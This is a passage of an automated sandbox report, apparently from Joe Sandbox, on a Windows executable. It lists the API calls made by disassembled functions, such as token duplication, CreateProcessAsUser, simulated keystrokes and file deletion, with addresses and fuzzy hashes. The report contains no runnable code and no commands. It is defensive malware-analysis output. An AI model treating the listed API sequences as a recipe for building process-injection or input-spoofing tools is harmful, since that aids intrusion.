          • Instruction Fuzzy Hash: 2BF05E302442029BC314AF66D549B6ABBE5AB55350F10053EE91997391DBB0A800CB99
          APIs
          • __lock_file.LIBCMT ref: 00415012
          • __ftell_nolock.LIBCMT ref: 0041501F
            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __ftell_nolock__getptd_noexit__lock_file
          • String ID:
          • API String ID: 2999321469-0
          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
          APIs
          • KiUserCallbackDispatcher.NTDLL ref: 0040F4F8
          • SystemParametersInfoW.USER32 ref: 0040F50E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CallbackDispatcherInfoParametersSystemUser
          • String ID:
          • API String ID: 1232580896-0
          • Opcode ID: d8f8af2b1fcf79be922ac17c0c2ac4c55c3bd2becb99395c609a7393468ab3ad
          • Instruction ID: 4f816421a473d1ad37b3e9d44d2267df4096a67e51a81083121342910445e2c7
          • Opcode Fuzzy Hash: d8f8af2b1fcf79be922ac17c0c2ac4c55c3bd2becb99395c609a7393468ab3ad
          • Instruction Fuzzy Hash: 93E0BF71690318B6E610DA849D46F99B75C9704B10F104156BB04AB2C1D5F1BD0087D5
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wsplitpath
          • String ID:
          • API String ID: 3929583758-0
          • Opcode ID: ece97fa0c697ffc21de49f313cb729708a1e71d94d55bdb479bb39174fd00fb6
          • Instruction ID: 18b82df0d7e162d71a6ea7d3c2891a85b0750a5b7d6f9757feacc07678a183bb
          • Opcode Fuzzy Hash: ece97fa0c697ffc21de49f313cb729708a1e71d94d55bdb479bb39174fd00fb6
          • Instruction Fuzzy Hash: 51317A716043009BD710FF65C881B5AB3D8AF85319F0489AEFC596B283D779ED09CBA6
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __lock_file
          • String ID:
          • API String ID: 3031932315-0
          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
          APIs
          • _wcslen.LIBCMT ref: 00443D34
            • Part of subcall function 00433D9E: EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: EnumProcesses_wcslen
          • String ID:
          • API String ID: 3303492691-0
          • Opcode ID: 61840f1e4be6ab7e74efaef90a4495a36a15179c598b7116193463e31052faad
          • Instruction ID: 973e428d5754fd58bf011f848023120356fa753a79d0ada774503799e32604de
          • Opcode Fuzzy Hash: 61840f1e4be6ab7e74efaef90a4495a36a15179c598b7116193463e31052faad
          • Instruction Fuzzy Hash: 05E0E5B3A010187BEA106A4ABC81DCB735CDBCA72EF040027F60887221E229AE0542F9
          APIs
          • __lock_file.LIBCMT ref: 004142F5
            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __getptd_noexit__lock_file
          • String ID:
          • API String ID: 2597487223-0
          • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
          • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
          • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
          • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __fread_nolock
          • String ID:
          • API String ID: 2638373210-0
          • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
          • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
          • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
          • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
          APIs
          • GetFileAttributesW.KERNEL32(?), ref: 0043399F
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: b77aa08cafc2a3d32093d7ac5c88f35f968f57013de6aa67bd4eb605d0773f83
          • Instruction ID: 548271e91b042d454508b47bab6801c4e70bba6bff5a1ae8573985b3968eb280
          • Opcode Fuzzy Hash: b77aa08cafc2a3d32093d7ac5c88f35f968f57013de6aa67bd4eb605d0773f83
          • Instruction Fuzzy Hash: CCC08071040308964D040DEC654D5D6335C9D45335F541681F9EC8B3D1C275BDDB57D4
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wfsopen
          • String ID:
          • API String ID: 197181222-0
          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
          APIs
          • SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 00472672
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FolderPath
          • String ID:
          • API String ID: 1514166925-0
          • Opcode ID: 5cbd4fea0a044a270ecd38b8717ed605c21a1dda0ade69ad23ddeccee42b0355
          • Instruction ID: 4c72add18c91e53ad1fe04ab93c3d942838632f89593f20c903d949672ade039
          • Opcode Fuzzy Hash: 5cbd4fea0a044a270ecd38b8717ed605c21a1dda0ade69ad23ddeccee42b0355
          • Instruction Fuzzy Hash: 16C09230788204FAF7204650CE4BF782628A700F01F204095BB0DB80C0C2E4A9494A29
          APIs
            • Part of subcall function 0044BF8B: _wcscat.LIBCMT ref: 0044BFC5
            • Part of subcall function 0044BF8B: __wsplitpath.LIBCMT ref: 0044BFEF
            • Part of subcall function 0044BF8B: FindFirstFileW.KERNEL32(?,?), ref: 0044C004
            • Part of subcall function 0044BF8B: _wcscpy.LIBCMT ref: 0044C030
            • Part of subcall function 0044BF8B: _wcscat.LIBCMT ref: 0044C042
            • Part of subcall function 0044BF8B: _wcscat.LIBCMT ref: 0044C054
            • Part of subcall function 0044BF8B: DeleteFileW.KERNEL32(?), ref: 0044C061
            • Part of subcall function 0044BF8B: FindNextFileW.KERNEL32(00000000,00000010), ref: 0044C075
            • Part of subcall function 0044BF8B: FindClose.KERNEL32(00000000), ref: 0044C084
          • GetLastError.KERNEL32 ref: 00466FD0
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FileFind_wcscat$CloseDeleteErrorFirstLastNext__wsplitpath_wcscpy
          • String ID:
          • API String ID: 3480085570-0
          • Opcode ID: d80c5c59ec35ebe04d1818c7ae67fffb751cedd3a35ebf6d6fa95b93d4499645
          • Instruction ID: d630f174b4867d7ece34175420dc70d9073c70f878cc884959f89135b683e2fa
          • Opcode Fuzzy Hash: d80c5c59ec35ebe04d1818c7ae67fffb751cedd3a35ebf6d6fa95b93d4499645
          • Instruction Fuzzy Hash: ADF030726002149BD710EFA9D945B86B7E8AF04318F14846EF888DB353DB79F9448B99
          APIs
          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
          • GetKeyState.USER32(00000011), ref: 0047C92D
          • GetKeyState.USER32(00000009), ref: 0047C936
          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
          • GetKeyState.USER32(00000010), ref: 0047C953
          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
          • _wcsncpy.LIBCMT ref: 0047CA29
          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
          • SendMessageW.USER32 ref: 0047CA7F
          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
          • ImageList_SetDragCursorImage.COMCTL32(009D3FD8,00000000,00000000,00000000), ref: 0047CB9B
          • ImageList_BeginDrag.COMCTL32(009D3FD8,00000000,000000F8,000000F0), ref: 0047CBAC
          • SetCapture.USER32(?), ref: 0047CBB6
          • ClientToScreen.USER32(?,?), ref: 0047CC17
          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
          • ReleaseCapture.USER32 ref: 0047CC3A
          • GetCursorPos.USER32(?), ref: 0047CC72
          • ScreenToClient.USER32(?,?), ref: 0047CC80
          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
          • SendMessageW.USER32 ref: 0047CD12
          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
          • SendMessageW.USER32 ref: 0047CD80
          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
          • GetCursorPos.USER32(?), ref: 0047CDC8
          • ScreenToClient.USER32(?,?), ref: 0047CDD6
          • GetParent.USER32(00000000), ref: 0047CDF7
          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
          • SendMessageW.USER32 ref: 0047CE93
          • ClientToScreen.USER32(?,?), ref: 0047CEEE
          • TrackPopupMenuEx.USER32 ref: 0047CF1C
          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
          • SendMessageW.USER32 ref: 0047CF6B
          • ClientToScreen.USER32(?,?), ref: 0047CFB5
          • TrackPopupMenuEx.USER32 ref: 0047CFE6
          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
          • String ID: @GUI_DRAGID$F
          • API String ID: 3100379633-4164748364
          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
          APIs
          • GetForegroundWindow.USER32 ref: 00434420
          • FindWindowW.USER32 ref: 00434446
          • IsIconic.USER32(?), ref: 0043444F
          • ShowWindow.USER32(?,00000009), ref: 0043445C
          • SetForegroundWindow.USER32(?), ref: 0043446A
          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
          • GetCurrentThreadId.KERNEL32 ref: 00434485
          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
          • SetForegroundWindow.USER32(00000000), ref: 004344B7
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
          • keybd_event.USER32 ref: 004344CF
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
          • keybd_event.USER32 ref: 004344E6
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
          • keybd_event.USER32 ref: 004344FD
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
          • keybd_event.USER32 ref: 00434514
          • SetForegroundWindow.USER32(00000000), ref: 0043451E
          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
          • String ID: Shell_TrayWnd
          • API String ID: 2889586943-2988720461
          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
          APIs
          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
          • CloseHandle.KERNEL32(?), ref: 004463A0
          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
          • GetProcessWindowStation.USER32 ref: 004463D1
          • SetProcessWindowStation.USER32 ref: 004463DB
          • OpenDesktopW.USER32 ref: 004463F7
          • _wcslen.LIBCMT ref: 00446498
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • _wcsncpy.LIBCMT ref: 004464C0
          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
          • CreateProcessAsUserW.ADVAPI32 ref: 00446522
          • UnloadUserProfile.USERENV(?,?), ref: 00446555
          • CloseWindowStation.USER32(00000000), ref: 0044656C
          • CloseDesktop.USER32 ref: 0044657A
          • SetProcessWindowStation.USER32 ref: 00446588
          • CloseHandle.KERNEL32(?), ref: 00446592
          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
          • String ID: $@OH$default$winsta0
          • API String ID: 3324942560-3791954436
          • Opcode ID: 0878da32f8adc19d992a62f4019b0367093db1d49a1638e5068655b67069c3d8
          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
          • Opcode Fuzzy Hash: 0878da32f8adc19d992a62f4019b0367093db1d49a1638e5068655b67069c3d8
          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
          APIs
          • _wcslen.LIBCMT ref: 004096C1
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • _memmove.LIBCMT ref: 0040970C
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
          • CharUpperBuffW.USER32(?,?), ref: 00409753
          • _memmove.LIBCMT ref: 00409D96
          • _memmove.LIBCMT ref: 0040A6C4
          • _memmove.LIBCMT ref: 004297E5
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
